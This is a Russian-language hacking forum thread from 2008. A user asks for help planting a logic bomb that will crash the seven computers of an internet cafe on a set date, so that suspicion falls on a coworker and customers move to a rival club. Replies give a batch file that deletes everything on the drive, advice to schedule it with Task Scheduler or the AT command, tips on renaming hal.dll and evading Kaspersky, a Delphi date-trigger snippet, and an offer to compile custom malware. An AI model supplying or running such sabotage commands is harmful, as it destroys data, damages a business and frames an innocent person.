Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Логическая бомба. Как реализовать? (https://forum.antichat.xyz/showthread.php?t=72067)

B1t.exe 30.05.2008 17:42

Логическая бомба. Как реализовать?
 
Есть дело такое.
Интернет салон. 7 компов.
система - wind XP, защита - Касперский, контроль - Clubtimer.
Задача: простой работоспособности компьютеров. (вызывать системный краш). Притом, это надо делать в определенный день, чтоб не подозревали, что администратор тут причем.
Вот логическая бомба, это по теме !

Теперь у меня не хватает фантазии, что и как можно делать? Имеется физический доступ к всем компам (есть возможность установки/удаление софта).
Рекомендуйте что небудь?

Ergoproxy 30.05.2008 17:46

засунь вир

B1t.exe 30.05.2008 19:07

Ergoproxy

1. все должен выполнятся в ОПРЕДЕЛЕННЫЙ день ! когда там нет администратора.
2. Стоит Касперский антивирус
3. Какой именно вирус может вызывать реальный системный краш ?

brasco2k 30.05.2008 19:09

Генератор апокалипсис.

Юзай его там есть функция даты запуска.

iv. 30.05.2008 19:11

Цитата:

1. все должен выполнятся в ОПРЕДЕЛЕННЫЙ день ! когда там нет администратора.
Task Scheduler

spetrov 30.05.2008 19:15

Выгоняют с работы - решил дверью хлопнуть? ))
Почему бы в шедулер не засунуть выполнение какой-нить замечательной команды, типа
удаления всего на диске?
или ты хочешь приостановить работу, чтобы легко восстановить было?

Ergoproxy 30.05.2008 19:17

Цитата:

Сообщение от B1t.exe
Ergoproxy

1. все должен выполнятся в ОПРЕДЕЛЕННЫЙ день ! когда там нет администратора.
2. Стоит Касперский антивирус
3. Какой именно вирус может вызывать реальный системный краш ?

Ну напиши, на делфи к примеру:в такое то время удалить такой то файлик без которого винда несможет жить и всё)

Olegros911 30.05.2008 19:37

Давай скомпелю вирь ты мне дату какую надо только в личку напиши.Только тут зверек будет рватса в автозагрузку так что проактивка может немножко ругатса,а так каспер молчать будет гарантия.ИНТЕРЕСУЕТ НАПИШИ В ЛИЧУ

spetrov 30.05.2008 20:45

http://forum.antichat.ru/threadnav12409-1-10.html
Используем поиск. Вуаля!

Теперь записываешь это в (то, что на 5 странице, в батник, можно склеить с иконкой, можно сделать .exe) и в шедулер стандартный виндовый.
Если просто батник какой-нить запихнуть в глубины системы - то если одмины не особо палят, что на машинах творится - не заметят. Каспер ничего не скажет - там все в порядке.


Либо просто hal.dll переименовать...

Olegros911 30.05.2008 21:53

Батник у него непрокатит потому что он хочет чтоб ето все произошло после того как он уйдет.А тут прокатит только логическая Бомба,тоесть вирь запрограмированый на время.Ты чувак постучи мне в асю в воскресенье мы ето дело быстро решим.Ех люблю я вирусы

B1t.exe 30.05.2008 22:15

to all

короче тема такая! тот тип, кто там работает как админ(ну всеголишь собирает деньги и тыкает на щетчики, даже стыдно назвать админ), он хочет открыть свой клуб :))))) и как-то надо перенаправить клиенты )))
и вот мне просит помочь в этом "бизнесе". Они работают по сменам, надо мутить так, чтоб логическая бомба выполнялся НЕ на него смене! теперь думаю всем ясно что за дела.
----------------------
brasco2k
Я посмотрю что за зверь это. спасибо

iv.
Мне все это удаленно надо делать, а тот тип - нуб в этих делах, мне месяц надо, чтоб его обяснить что такое планировщик ! не катит этот вариант, да и слишком НАГЛО будет так..

Olegros911
Твой вариант самый подходящий ! Ведь надо еще и так делать, чтоб подозрение не было. все знают, что вирусы на что способно. :) воскресеье договоримся тогда.

Olegros911 30.05.2008 23:38

ОК.

spetrov 02.06.2008 12:06

Цитата:

Сообщение от Olegros911
Батник у него непрокатит потому что он хочет чтоб ето все произошло после того как он уйдет.А тут прокатит только логическая Бомба,тоесть вирь запрограмированый на время.Ты чувак постучи мне в асю в воскресенье мы ето дело быстро решим.Ех люблю я вирусы

А шедулер на что? А если удаленно, так можно через AT-команду закинуть в шедулер даже не подходя к машине.

Еще вариант батника -
@echo off
cd c:\
del /s /q *.*

Вот честно, дабы не геморроиться - я бы предпочел простые варианты.

0verbreaK 04.06.2008 21:14

На мой взгляд легче самому написать мини троян, который по определенному времени выполняет запланированное действие, заюзай например, WinAPI функции

GetLocalTime

Код:

var
  lpst:_SYSTEMTIME;
begin
  GetLocalTime(lpst);
  if (lpst.wDay = 13) and (lpst.wHour = 23) and
  (lpst.wMinute = 59) and (lpst.wSecond = 59) then
  begin
    // Выполняем определенное действие
  end;



Время: 21:52